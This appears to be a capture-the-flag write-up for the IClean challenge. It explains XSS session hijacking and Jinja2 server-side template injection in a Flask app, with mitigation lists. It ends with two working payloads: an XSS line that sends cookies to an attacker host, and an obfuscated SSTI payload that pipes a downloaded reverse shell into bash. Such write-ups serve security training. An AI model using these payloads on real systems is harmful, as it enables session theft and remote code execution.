IClean is a challenge that starts with identifying vulnerabilities in a Flask web application. First, an XSS vulnerability is exploited to obtain a session cookie, which is then used to bypass authentication and access the dashboard page. Next, an server side template injection (SSTI) vulnerability on the dashboard page is exploited to gain remote code execution (RCE). Hardcoded credentials in a Python script allow for dumping hashes from a database, and one of the hashes is cracked, enabling lateral movement to a standard user account. This user has sudo privileges over a binary, which is exploited to extract the root user's private SSH key, ultimately achieving privilege escalation.
- nmap
- Burpsuite
- Meyerweb.com
- crackstation.net
A type of vulnerability that allows a threat actor to inject a malicious payload into content viewed by other users. When viewed, the malicious payload is executed, leading to potential breaches such as:
- Data theft
- Session hijacking
- Other types of security breaches
Session Hijacking Exploiting a session by stealing or predicting a valid token The stolen or predicted token can be used to:
- Bypass authentication mechanisms
- Steal data.
Mitigation
-
Use HTTPS: Ensure all communication between the client and server is encrypted using HTTPS to prevent session hijacking via network sniffing.
-
User-Agent and IP Binding: To prevent session hijacking, bind the session to the user’s IP address and User-Agent string.
Server-side Template Injection (SSTI) is a security vulnerability that arises when an attacker injects malicious code into a web application's templates. This occurs when the template engine doesn't properly separate template code from user-input data, causing the injected code to be executed as part of the template. This allows attackers to execute malicious payloads, potentially leading to severe security breaches.
Mitigation
-
Input Validation: Validate and sanitise all user inputs to ensure they do not contain executable code.
-
Use Secure Templates: Choose template engines with built-in security features and avoid using insecure or outdated ones.
-
Escape User Inputs: Always escape user inputs before including them in templates to prevent execution as code.
-
Whitelist Inputs: Use a whitelist approach to limit the types of data that can be included in templates.
-
Limit Template Functionality: Restrict the capabilities of the template engine to minimise the risk of code execution.
-
Separate Data and Code: To prevent mixing executable code with user inputs, ensure a clear separation between the template logic and user data.
-
Security Audits: Regularly perform security audits and code reviews to identify and fix potential SSTI vulnerabilities.
-
Keep Dependencies Updated: Regularly update the template engine and other dependencies to the latest versions with security patches.
<img src=x onerror=fetch("http://<IP>:PORT/"+document.cookie);>
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl IP:PORT/revshell | bash")|attr("read")()}}